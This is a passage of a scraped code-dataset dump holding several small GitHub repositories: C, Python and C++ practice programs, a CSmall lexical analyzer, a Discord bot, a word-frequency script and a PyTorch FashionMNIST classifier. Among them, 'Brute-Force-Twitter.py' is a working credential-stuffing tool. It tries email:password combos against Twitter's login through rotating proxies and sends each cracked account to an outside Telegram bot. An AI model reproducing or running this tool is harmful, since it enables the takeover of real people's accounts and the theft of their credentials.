"UTF-8", "text": "/*\n Input: 2T lines:\n a string str\n a char ch\n Output:\n instance of ch in str\n*/\n\n#include <stdio.h>\n#include <string.h>\n#include <ctype.h>\n\nint arr[26];\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = fopen(\"D:\\\\input.txt\", \"r\");\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T;\n char str[10000], ch;\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n fscanf(fptr, \" %[^\\n]\", str);\n fscanf(fptr, \" %c\", &ch);\n\n for(int i = 0; i < 26; i++)\n arr[i] = 0;\n\n for(int j = 0; str[j]; j++)\n str[j] = tolower(str[j]);\n\n for(int j = 0; str[j]; j++)\n arr[str[j] - 'a']++;\n\n printf(\"In %s, Count of:\\n\", str);\n for(int j = 0; j < 26; j++)\n {\n if(arr[j])\n printf(\"%c --> %d\\n\", ('a' + j), arr[j]);\n }\n }\n printf(\"\\n\");\n }\n\n return 0;\n}\n\n\n" }, { "alpha_fraction": 0.37919461727142334, "alphanum_fraction": 0.4161073863506317, "avg_line_length": 17.6875, "blob_id": "c59edddf8071d8c5e08b590ab89368d53278c034", "content_id": "b248441498544509d991b97e5ea5e90dfabf3c13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 298, "license_type": "no_license", "max_line_length": 43, "num_lines": 16, "path": "/Sieve Prime.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "import math\ndef sieve(n):\n prime = [True] * n\n\n for i in range(2, int(math.sqrt(n))+1):\n j = 2\n if prime[i]:\n while(i*j < n):\n prime[i*j] = False\n j += 1\n\n for i in range(2, n):\n if prime[i]:\n print(i)\n\nsieve(100000)" }, { "alpha_fraction": 0.3497989773750305, "alphanum_fraction": 0.3653073012828827, "avg_line_length": 18.33333396911621, "blob_id": "cc00c496d5342d180d81568990541f4fd1832153", "content_id": "fd4e5da4c23d862116aef430fd0e38ad7f82b274", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1741, "license_type": "no_license", "max_line_length": 57, "num_lines": 90, "path": "/sort.cpp", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nusing namespace std;\n\nvoid swapN(int *a, int *b)\n{\n int temp = *a;\n *a = *b;\n *b = temp;\n}\n\nvoid SelectionSort(int arr[], int n)\n{\n int index_min, temp;\n for(int i = 0; i < (n-1); i++)\n {\n index_min = i;\n for(int j = i; j < n; j++)\n {\n if(arr[j]<arr[index_min]) index_min = j;\n }\n\n if(index_min != i)\n {\n swapN(&arr[i], &arr[index_min]);\n// temp = arr[i];\n// arr[i] = arr[index_min];\n// arr[index_min] = temp;\n }\n }\n}\n\nvoid BubbleSort(int arr[], int n)\n{\n for(int i = 0; i < (n-1); i++)\n {\n bool flag = true;\n for(int j = 0; j < (n-1); j++)\n {\n if(arr[j]>arr[j+1])\n {\n swapN(&arr[j], &arr[j+1]);\n flag = false;\n }\n }\n\n printf(\"\\nafter %dth iteration\\n\", i);\n for(int j = 0; j < n; j++) printf(\"%d \", arr[j]);\n\n if(flag) break;\n }\n}\n\nvoid InsertionSort(int arr[], int n)\n{\n int j, idx, item, flag;\n for(int i = 1; i < n; i++)\n {\n //flag = 1;\n item = arr[i];\n j = i-1;\n\n //for(int j = idx; j >= 0; j--)\n while(j >= 0 && arr[j]>item)\n {\n// if(arr[j] < item)\n// {\n// idx = j;\n// flag = 0;\n// break;\n// }\n arr[j+1] = arr[j];\n j--;\n }\n\n arr[j+1] = item;\n\n printf(\"\\nafter %dth iteration\\n\", i);\n for(int j = 0; j < n; j++) printf(\"%d \", arr[j]);\n }\n}\n\nint main()\n{\n int arr[] = {3, 1, 2, 5, 4};\n\n InsertionSort(arr, 5);\n //for(int i = 0; i < 5; i++) printf(\"%d \", arr[i]);\n\n return 0;\n}\n\n" } ]
31
felipefrm/lexical-analyzer
https://github.com/felipefrm/lexical-analyzer
f7415afc28a812cd7e4d70a98ca2850d9884c912
09403b188caf691b39f4636822db844fa7248b8f
bcf9e50d594f6d6fe64faee276cbf43659275078
refs/heads/master
2023-03-13T21:02:43.936442
2021-03-13T00:32:17
2021-03-13T00:32:17
345,463,110
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.26143792271614075, "alphanum_fraction": 0.26143792271614075, "avg_line_length": 18.125, "blob_id": "828d5c398e2483cebd8825d2b1fd318d267007d2", "content_id": "c9e165a384065e775c8d33f8b9f0f51ed1c94ebf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 612, "license_type": "permissive", "max_line_length": 23, "num_lines": 32, "path": "/token_csmall.py", "repo_name": "felipefrm/lexical-analyzer", "src_encoding": "UTF-8", "text": "tokens = {\n \"main\": \"MAIN\",\n \"int\": \"INT\",\n \"float\": \"FLOAT\",\n \"if\": \"IF\",\n \"else\": \"ELSE\",\n \"while\": \"WHILE\",\n \"for\": \"FOR\",\n \"read\": \"READ\",\n \"print\": \"PRINT\",\n \"(\": \"LBRACKET\",\n \")\": \"RBRACKET\",\n \"{\": \"LBRACE\",\n \"}\": \"RBRACE\",\n \",\": \"COMMA\",\n \";\": \"PCOMMA\",\n \"=\": \"ATTR\",\n \"==\": \"EQ\",\n \"!=\": \"NE\",\n \"||\": \"OR\",\n \"&&\": \"AND\",\n \"<\": \"LT\",\n \"<=\": \"LE\",\n \">\": \"GT\",\n \">=\": \"GE\",\n \"+\": \"PLUS\",\n \"-\": \"MINUS\",\n \"*\": \"MULT\",\n \"/\": \"DIV\",\n \"[\": \"LCOL\",\n \"]\": \"RCOL\" \n}\n" }, { "alpha_fraction": 0.579211950302124, "alphanum_fraction": 0.5873196125030518, "avg_line_length": 32.879119873046875, "blob_id": "8959502b7e0bc9fd687d5fe2a66b83877991bcb3", "content_id": "ede7a2ca13349915428881eba764b730ff277d0e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6198, "license_type": "permissive", "max_line_length": 146, "num_lines": 182, "path": "/analyzer.py", "repo_name": "felipefrm/lexical-analyzer", "src_encoding": "UTF-8", "text": "from token_csmall import tokens\nfrom tabulate import tabulate\nimport argparse\nimport re\n\n# Argumentos da linha de comandos: -i [arquivo de entrada .c] -o [arquivo de saida contendo os tokens]\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\", \"--input\", help=\"insert the path and name of a .c file (DEFAULT: 'input/teste_attr1.c')\", default=\"input/teste_attr1.c\")\nparser.add_argument(\"-o\", \"--output\", help=\"insert the path and name of output file (DEFAULT: 'output/output.txt')\", default=\"output/output.txt\")\nargs = parser.parse_args()\n\nf_in = open(args.input, \"r\") # Le arquivo de entrada\n\ntoken_list = [] # Lista de tokens identificados \nbuffer = [] # Buffer que forma o lexema\nstate = 0 # Estado inicial do automato\nline_count = 1 \n\nfor line in f_in: # Percorre todas as linhas do arquivo de entrada\n line = line.rstrip('\\n')\n char_count = 0\n\n while (char_count < len(line)): # Percorre todos os caracteres da linha\n char = line[char_count]\n\n if state == 0:\n if char.isalpha():\n state = 1\n buffer.append(char)\n elif char.isnumeric():\n state = 2\n buffer.append(char)\n elif char == '<':\n state = 5\n buffer.append(char)\n elif char == '>':\n state = 6\n buffer.append(char)\n elif char == '=':\n state = 7\n buffer.append(char)\n elif char == '!':\n state = 8\n buffer.append(char)\n elif char == '|':\n state = 9\n buffer.append(char)\n elif char == '&':\n state = 10\n buffer.append(char)\n elif char == ' ':\n pass\n else:\n buffer.append(char)\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n\n elif state == 1:\n if re.match('^[a-zA-Z0-9_]*$', char):\n buffer.append(char)\n else:\n char_count -= 1\n state = 0\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme] if lexeme in tokens else \"ID\", lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n\n elif state == 2:\n if char.isnumeric():\n buffer.append(char)\n elif char == '.':\n state = 3\n buffer.append(char)\n else:\n char_count -= 1\n state = 0\n lexeme = ''.join(buffer)\n token_list.append(['INTEGER_CONST', lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n \n elif state == 3:\n if char.isnumeric():\n state = 4\n buffer.append(char)\n else:\n print(f'Falha no estado {state}: produção não aceita pelo analisador léxico da linguagem Csmall.')\n\n elif state == 4:\n if char.isnumeric():\n buffer.append(char)\n else:\n char_count -= 1\n state = 0\n lexeme = ''.join(buffer)\n token_list.append(['FLOAT_CONST', lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n\n elif state == 5:\n if (char == '='):\n state = 0\n buffer.append(char)\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n else:\n char_count -= 1\n state = 0\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n\n elif state == 6:\n if (char == '='):\n state = 0\n buffer.append(char)\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n else:\n char_count -= 1\n state = 0\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n\n elif state == 7:\n if (char == '='):\n state = 0\n buffer.append(char)\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n else:\n char_count -= 1\n state = 0\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n\n elif state == 8:\n if (char == '='):\n state = 0\n buffer.append(char)\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n else:\n print(f'Falha no estado {state}: produção não aceita pelo analisador léxico da linguagem Csmall.')\n\n elif state == 9:\n if (char == '|'):\n state = 0\n buffer.append(char)\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n else:\n print(f'Falha no estado {state}: produção não aceita pelo analisador léxico da linguagem Csmall.')\n\n elif state == 10:\n if (char == '&'):\n state = 0\n buffer.append(char)\n lexeme = ''.join(buffer)\n token_list.append([tokens[lexeme], lexeme, line_count]) # Adiciona o token à lista de tokens identificados\n buffer = [] # Limpa o buffer\n else:\n print(f'Falha no estado {state}: produção não aceita pelo analisador léxico da linguagem Csmall.')\n \n char_count += 1\n line_count += 1\n\n# Ultimo token refere ao fim do arquivo -> EOF\ntoken_list.append(['EOF', '', line_count])\n\n# Escreve no arquivo de saida os tokens identificados na produção\nf_out = open(args.output, \"w\")\nf_out.write(tabulate(token_list, headers=['Token', 'Lexema', 'Linha']))\nf_out.close()\n\nf_in.close()\n\n" }, { "alpha_fraction": 0.7085019946098328, "alphanum_fraction": 0.7145748734474182, "avg_line_length": 22.5238094329834, "blob_id": "0e56da3d19343bed8aab1f941e81f748a303668d", "content_id": "7b41b6a54fe201f165fd510ff845c8b7b64c9172", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 494, "license_type": "permissive", "max_line_length": 94, "num_lines": 21, "path": "/README.md", "repo_name": "felipefrm/lexical-analyzer", "src_encoding": "UTF-8", "text": "# Lexical Analyzer for CSmall Language\n\n### 1. Csmall\nCsmall is a subset of the C programming language, with a reduced amount of tokens.\n\n### 1. How To Run\n```sh\n # Clone this repository\n $ git clone https://github.com/felipefrm/lexical-analyzer.git\n\n # Go into the repository\n cd lexical-analyzer\n\n # install dependency\n $ pip install tabulate\n\n # run the app\n $ python3 -i [input file containing the csmall code] -o [output file with identified tokens]\n\n # check the output file\n```\n" } ]
3
alex-px/most-common
https://github.com/alex-px/most-common
77d2be3b447e54ce08ac7bee6b68a3dd5bcdf892
6a752b5f2724f86f9665282ac0e5e5823cc1776b
dff0e5f2f79e21e29692d684c2e85f9a64baee01
refs/heads/master
2021-07-05T14:01:01.153724
2017-09-30T15:21:15
2017-09-30T15:21:15
103,992,863
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.551487386226654, "alphanum_fraction": 0.5743706822395325, "avg_line_length": 19.85714340209961, "blob_id": "6010c2435a677edc103ef96a0042102053231b95", "content_id": "9b93610ae1a972e26235c46cb7842fd32e9b9f90", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 437, "license_type": "permissive", "max_line_length": 56, "num_lines": 21, "path": "/helpers.py", "repo_name": "alex-px/most-common", "src_encoding": "UTF-8", "text": "from nltk import pos_tag\n\n\ndef flat(_list):\n \"\"\" [(1,2), (3,4)] -> [1, 2, 3, 4]\"\"\"\n return sum([list(item) for item in _list], [])\n\n\ndef is_verb(word):\n if not word:\n return False\n pos_info = pos_tag([word])\n return pos_info[0][1] == 'VB'\n\n\ndef split_snake_case_to_words(name):\n return [word for word in name.split('_') if word]\n\n\ndef is_magic_name(name):\n return name.startswith('__') and name.endswith('__')" }, { "alpha_fraction": 0.6754874587059021, "alphanum_fraction": 0.688022255897522, "avg_line_length": 26.615385055541992, "blob_id": "4129f695804f250188e8fcb8574ffe0030d1fed2", "content_id": "f822156c6422627e900c6d781c1de74abe246268", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 718, "license_type": "permissive", "max_line_length": 111, "num_lines": 26, "path": "/README.md", "repo_name": "alex-px/most-common", "src_encoding": "UTF-8", "text": "## python-most-common\nPython script for calculating occurrences of words, verbs or function names in .py files in specified location.\n\n#### Usage\nJust run most_common.py with python interpreter and with desired command/arguments.\n\n##### Commands:\n- words\n```bash\n$ pyhton most_common.py words --path /tmp/my-scripts --top 4\n```\n- verbs\n```bash\n$ pyhton most_common.py verbs --path /tmp/my-scripts\n```\n- functions\n```bash\n$ pyhton most_common.py functions\n```\n\n##### Arguments:\n- Path for parsing: `--path` When not specified, current working directory is used.\n- Number of values in resulting set: `--top` If absent, full set will be returned.\n\n##### Output: \n[('path', 18), ('names', 14), ('name', 14), ('tree', 12)]\n" }, { "alpha_fraction": 0.6396193504333496, "alphanum_fraction": 0.6413723826408386, "avg_line_length": 29.71538543701172, "blob_id": "29024ea69dc39db1ef1084868aedc1d890916ecf", "content_id": "d0f870d9da3b754a5f6aa8cf741766e80075fb0d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3993, "license_type": "permissive", "max_line_length": 78, "num_lines": 130, "path": "/most_common.py", "repo_name": "alex-px/most-common", "src_encoding": "UTF-8", "text": "from argparse import ArgumentParser\nimport ast\nimport collections\nimport os\n\nfrom helpers import (is_verb,\n flat,\n split_snake_case_to_words,\n is_magic_name)\n\n\ndef find_py_files_in_path(root):\n py_files = []\n for current_dir, sub_dirs, files in os.walk(root):\n for current_file in files:\n if not current_file.endswith('.py'):\n continue\n py_files.append(os.path.join(current_dir, current_file))\n return py_files\n\n\ndef resolve_file_into_tree(file_path):\n with open(file_path, 'r', encoding='utf-8') as attempt_handler:\n main_file_content = attempt_handler.read()\n try:\n return ast.parse(main_file_content)\n except SyntaxError as e:\n print(e)\n\n\ndef fetch_trees_from_path(_path):\n trees = []\n py_files = find_py_files_in_path(_path)\n print('total %s py files found' % len(py_files))\n\n for py_file in py_files:\n tree = resolve_file_into_tree(py_file)\n if not tree:\n continue\n trees.append(tree)\n print('trees generated')\n return trees\n\n\ndef find_all_names_in_tree(tree):\n return [node.id for node in ast.walk(tree) if isinstance(node, ast.Name)]\n\n\ndef find_function_names_in_tree(tree):\n return [node.name.lower()\n for node in ast.walk(tree)\n if isinstance(node, ast.FunctionDef)]\n\n\ndef extract_verbs_from_snake_case(name):\n return [word for word\n in split_snake_case_to_words(name)\n if is_verb(word)]\n\n\ndef receive_names_in_path(_path):\n all_names = []\n for tree in fetch_trees_from_path(_path):\n all_names.extend(find_all_names_in_tree(tree))\n\n return flat([split_snake_case_to_words(name)\n for name in all_names\n if not is_magic_name(name)])\n\n\ndef receive_function_names_in_path(_path):\n function_names = []\n for tree in fetch_trees_from_path(_path):\n function_names.extend(find_function_names_in_tree(tree))\n return [f_name for f_name in function_names if not is_magic_name(f_name)]\n\n\ndef receive_function_verbs_in_path(_path):\n return flat([extract_verbs_from_snake_case(function_name)\n for function_name\n in receive_function_names_in_path(_path)])\n\n\ndef get_top_words_in_path(path, top=10):\n all_words = receive_names_in_path(path)\n return collections.Counter(all_words).most_common(top)\n\n\ndef get_top_verbs_in_path(path, top=10):\n all_verbs = receive_function_verbs_in_path(path)\n return collections.Counter(all_verbs).most_common(top)\n\n\ndef get_top_functions_names_in_path(path, top=10):\n all_function_names = receive_function_names_in_path(path)\n return collections.Counter(all_function_names).most_common(top)\n\n\ndef parse_args():\n parser = ArgumentParser(description='Calculate words occurrences in path')\n\n subparsers = parser.add_subparsers()\n\n parser_words = subparsers.add_parser(\n 'words',\n help='- words occurrences')\n parser_words.add_argument('--path', help='path to parse', default='./')\n parser_words.add_argument('--top', help='top number to return', type=int)\n parser_words.set_defaults(func=get_top_words_in_path)\n\n parser_verbs = subparsers.add_parser(\n 'verbs',\n help='- verbs occurrences')\n parser_verbs.add_argument('--path', help='path to parse', default='./')\n parser_verbs.add_argument('--top', help='top number to return', type=int)\n parser_verbs.set_defaults(func=get_top_verbs_in_path)\n\n parser_funcs = subparsers.add_parser(\n 'functions',\n help='- function names occurrences')\n parser_funcs.add_argument('--path', help='path to parse', default='./')\n parser_funcs.add_argument('--top', help='top number to return', type=int)\n parser_funcs.set_defaults(func=get_top_functions_names_in_path)\n\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = parse_args()\n print(args.func(args.path, args.top))\n" } ]
3
Harbif/Brute-Force-Twitter
https://github.com/Harbif/Brute-Force-Twitter
a94f86f54fc2d923d0d0b3f702003f68f2fe2ce2
68c068fb1246005f220dafa95d11add92cfa4c5b
b180aadb104347683c44ff6f026217b669da4ae2
refs/heads/main
2023-08-21T18:28:01.043215
2021-09-18T10:28:02
2021-09-18T10:28:02
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8095238208770752, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 21, "blob_id": "a6ea1cc65792b6d30093f282563081323ad471fa", "content_id": "45cbc8d4a092fd6c3484cd198382dec6b9498c6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 21, "license_type": "no_license", "max_line_length": 21, "num_lines": 1, "path": "/README.md", "repo_name": "Harbif/Brute-Force-Twitter", "src_encoding": "UTF-8", "text": "# Brute-Force-Twitter" }, { "alpha_fraction": 0.5953512787818909, "alphanum_fraction": 0.6756471395492554, "avg_line_length": 45.74074172973633, "blob_id": "dbd8221b117f89b48f80dfe3c13d416101e2ac09", "content_id": "5d21ea878f6efa1d33c12704368dd29731cc67dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3965, "license_type": "no_license", "max_line_length": 569, "num_lines": 81, "path": "/Brute-Force-Twitter.py", "repo_name": "Harbif/Brute-Force-Twitter", "src_encoding": "UTF-8", "text": "try:\n\timport requests,random,time,os,colorama,pyfiglet\nexcept ModuleNotFoundError:\n\tos.system('pip install requests')\n\tos.system('pip install colorama')\n\tos.system('pip uninstall colorama')\n\tos.system('pip install colorama')\n\tos.system('pip install pyfiglet')\n\tprint('\\n\\t>[+] Done Downloading ')\nprint(colorama.Fore.CYAN+\"[$] Brute Force\")\nprint(str(pyfiglet.figlet_format('Twitter'))+f\"By {colorama.Fore.RED}@TweakPY - @vv1ck </>\\n{colorama.Fore.RESET}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\")\nID=input('[+] Enter YOUR ID : ')\ntoken=input('[+] Enter TOKEN BOT : ')\ndef CHECK(user,pess):\n\ttry:\n\t\tproxylist=[]\n\t\tproxy=open('proxy.txt', 'r').read().splitlines()\n\texcept FileNotFoundError:\n\t\tprint(colorama.Fore.RED+\"\\n[-] Proxy's File Not Found !\\n\"+colorama.Fore.RESET)\n\t\texit()\n\tfor pxr in proxy:\n\t\tproxylist.append(pxr)\n\t\tpxx=str(random.choice(proxylist))\n\thead={\n\t\t#head-data by @6g7r\n\t\t'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n\t\t'Accept-Encoding': 'gzip, deflate, br',\n\t\t'Accept-Language': 'ar,en-US;q=0.7,en;q=0.3',\n\t\t'Content-Length': '901',\n\t\t'Content-Type': 'application/x-www-form-urlencoded',\n\t\t'Cookie': 'personalization_id=\"v1_aFGvGiam7jnp1ks4ml5SUg==\"; guest_id=v1%3A161776685629025416; gt=1379640315083112449; ct0=de4b75112a3f496676a1b2eb0c95ef65; _twitter_sess=BAh7CSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCIA8a6p4AToMY3NyZl9p%250AZCIlM2RlMDA1MzYyNmJiMGQwYzQ1OGU2MjFhODY5ZGU5N2Y6B2lkIiU4ODM0%250AMjM5OTNlYjg0ZGExNzRiYTEwMWE0M2ZhYTM0Mw%253D%253D--f5b0bce9df3870f1a221ae914e684fbdc533d03d; external_referer=padhuUp37zjgzgv1mFWxJ12Ozwit7owX|0|8e8t2xd8A2w%3D; _mb_tk=10908ac0975311eb868c135992f7d397',\n\t\t'Host': 'twitter.com',\n\t\t'Origin': 'https://twitter.com',\n\t\t'Referer': 'https://twitter.com/login?lang=ar',\n\t\t'TE': 'Trailers',\n\t\t'Upgrade-Insecure-Requests': '1',\n\t\t'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0', }\n\tdata={\n\t\t'redirect_after_login': '/',\n\t\t'remember_me': '1',\n\t\t'authenticity_token': '10908ac0975311eb868c135992f7d397',\n\t\t'wfa': '1',\n\t\t'ui_metrics': '{\\\"rf\\\":{\\\"ab4c9cdc2d5d097a5b2ccee53072aff6d2b5b13f71cef1a233ff378523d85df3\\\":1,\\\"a51091a0c1e2864360d289e822acd0aa011b3c4cabba8a9bb010341e5f31c2d2\\\":84,\\\"a8d0bb821f997487272cd2b3121307ff1e2e13576a153c3ba61aab86c3064650\\\":-1,\\\"aecae417e3f9939c1163cbe2bde001c0484c0aa326b8aa3d2143e3a5038a00f9\\\":84},\\\"s\\\":\\\"MwhiG0C4XblDIuWnq4rc5-Ua8dvIM0Z5pOdEjuEZhWsl90uNoC_UbskKKH7nds_Qdv8yCm9Np0hTMJEaLH8ngeOQc5G9TA0q__LH7_UyHq8ZpV2ZyoY7FLtB-1-Vcv6gKo40yLb4XslpzJwMsnkzFlB8YYFRhf6crKeuqMC-86h3xytWcTuX9Hvk7f5xBWleKfUBkUTzQTwfq4PFpzm2CCyVNWfs-dmsED7ofFV6fRZjsYoqYbvPn7XhWO1Ixf11Xn5njCWtMZOoOExZNkU-9CGJjW_ywDxzs6Q-VZdXGqqS7cjOzD5TdDhAbzCWScfhqXpFQKmWnxbdNEgQ871dhAAAAXiqazyE\\\"}',\n\t\t'session[username_or_email]': user,\n\t\t'session[password]': pess}\n\ttry:\n\t\ttime.sleep(0.7)\n\t\tproxx={\n\t\t\t'http': f'http://{pxx}',\n\t\t\t'https': f'http://{pxx}'}\n\t\treq=requests.post(f'https://twitter.com/sessions',headers=head,data=data,proxies=proxx,timeout=3)\n\t\tif (\"ct0\") in req.cookies:\n\t\t\tprint(colorama.Fore.GREEN+'--------------------------------')\n\t\t\tprint(f'Hacked: [{user}:{pess}] ')\n\t\t\tYES=f\"\"\"\n[✓] Hacked :\n[✓] Email: {user}\n[✓] Pass: {pess}\n━━━━━━━━━━━━━\"\"\"\n\t\t\tprint(\"[/] Enjoy\")\n\t\t\tprint('--------------------------------'+colorama.Fore.RESET)\n\t\t\ttry:requests.post(f'https://api.telegram.org/bot{token}/sendMessage?chat_id={ID}&text={YES}\\nBY @TweakPY @vv1ck 💸')\n\t\t\texcept:pass\n\t\t\twith open('GOOD.txt', 'a') as x:\n\t\t\t\tx.write(f'{user}:{pess}'+'\\n')\n\t\telse:print(colorama.Fore.RED+f\"NOT HACKED : [{user}:{pess}]\"+colorama.Fore.RESET)\n\texcept requests.exceptions.ConnectionError:print(colorama.Fore.RED+\"[-] Bad Proxy !!\"+colorama.Fore.RESET)\n\texcept requests.exceptions.ReadTimeout:print(colorama.Fore.RED + \"[-] Bad Proxy !!\" + colorama.Fore.RESET)\n\texcept KeyboardInterrupt:exit(0)\ndef FILname():\n\tF=input('[+] Enter The Combo File Name : ')\n\tprint('━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━')\n\ttry:\n\t\tfor x in open(f'{F}.txt','r').read().splitlines():\n\t\t\tuser=x.split(\":\")[0]\n\t\t\tpess=x.split(\":\")[1]\n\t\t\tCHECK(user,pess)\n\texcept FileNotFoundError:\n\t\tprint(colorama.Fore.RED+'\\n[-] The file name is incorrect !\\n'+colorama.Fore.RESET)\n\t\treturn FILname()\nFILname()\n" } ]
2
gkdnr5148/ksp_bot
https://github.com/gkdnr5148/ksp_bot
092483ce2c1f72f84b9d458f13df6448305bf622
b76ba6d1370609ea5631d03e3b3bfccb10fe4105
fe0ab0c2f9628355c17f65b6c0e8edd720ed0144
refs/heads/master
2020-05-24T12:30:56.753954
2019-05-17T21:02:36
2019-05-17T21:02:36
187,269,738
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6468144059181213, "alphanum_fraction": 0.6509695053100586, "avg_line_length": 25.769229888916016, "blob_id": "f7a9b29b37b92fafce718b8df1a94f0b13ff3f27", "content_id": "7dc5b96565ebd4f0c09af74ecaff37c3078b1442", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 784, "license_type": "no_license", "max_line_length": 77, "num_lines": 26, "path": "/scrim.py", "repo_name": "gkdnr5148/ksp_bot", "src_encoding": "UTF-8", "text": "import discord\r\nimport os\r\nclient = discord.Client()\r\n\r\n\r\[email protected]\r\nasync def on_ready():\r\n print(client.user.id)\r\n print(\"ready\")\r\n game = discord.Game(\"KSP_SCRIM BOT\")\r\n await client.change_presence(status=discord.Status.online, activity=game)\r\n\r\n\r\n\r\[email protected]\r\nasync def on_message(message):\r\n if message.content.startswith(\"!서버\"):\r\n await message.channel.send(\"```도쿄GCE1```\")\r\n if message.content.startswith(\"!안내\"):\r\n await message.channel.send(\"@everyone 금일부터 시간표가 변경되었습니다.\")\r\n if message.content.startswith(\"!카운트1\"):\r\n await message.channel.send(\"a!scrim countdown 1 곧시작합니다.\")\r\n\r\n \r\naccess_token = os.environ[\"BOT_TOKEN\"] \r\nclient.run(access_token)\r\n" } ]
1
mridul-eecs/FashionMNIST_pytorch
https://github.com/mridul-eecs/FashionMNIST_pytorch
6eb34d51b4921abe092258d921fb678f80a91cf3
6a46278f75548bac983068ad386e5a8991cf4bec
7c2ce1670c327eb7f5b8cb2b9640d3d001448fd5
refs/heads/master
2020-08-21T10:40:39.463524
2019-11-20T05:23:46
2019-11-20T05:23:46
216,141,961
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5890731811523438, "alphanum_fraction": 0.6146341562271118, "avg_line_length": 33.15999984741211, "blob_id": "4be179068cae9198172b52025806c2ced919a964", "content_id": "4dd9b11a724356019e8985ff35563edfb9f91e75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5125, "license_type": "no_license", "max_line_length": 145, "num_lines": 150, "path": "/main.py", "repo_name": "mridul-eecs/FashionMNIST_pytorch", "src_encoding": "UTF-8", "text": "import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.transforms.transforms as transforms\nimport torch.nn.functional as func\n\nprint(torch.cuda.is_available())\nprint(torch.__version__)\n\n\ntrain_set= torchvision.datasets.FashionMNIST(\n train= True,\n root= '../data/FashionMNIST/train/',\n download= True,\n transform= transforms.Compose([transforms.ToTensor()])\n)\ntest_set= torchvision.datasets.FashionMNIST(\n train= False,\n root= '../data/FashionMNIST/test/',\n download= True,\n transform= transforms.Compose([transforms.ToTensor()])\n)\nprint(\"train set:\", len(train_set))\nprint(\"test set:\", len(test_set))\n\n\n\n# Network\n# formula for channels \n\nclass Network(nn.Module):\n def __init__(self):\n super(Network, self).__init__()\n # Convolutional layer1\n self.conv1= nn.Sequential()\n self.conv1.add_module(\"conv1\", nn.Conv2d(in_channels= 1, out_channels= 6, kernel_size= 5))\n self.conv1.add_module(\"bn1\", nn.BatchNorm2d(num_features= 6, eps= 1e-05, momentum= 0.1, affine= True))\n self.conv1.add_module(\"relu\", nn.ReLU(inplace= False))\n self.conv1.add_module(\"pool\", nn.MaxPool2d(kernel_size= 2, stride= 2))\n\n # Convolutional layer2\n self.conv2= nn.Sequential()\n self.conv2.add_module(\"conv2\", nn.Conv2d(in_channels= 6, out_channels= 12, kernel_size= 5))\n self.conv2.add_module(\"bn2\", nn.BatchNorm2d(num_features= 12, eps= 1e-05, momentum= 0.1, affine= True))\n 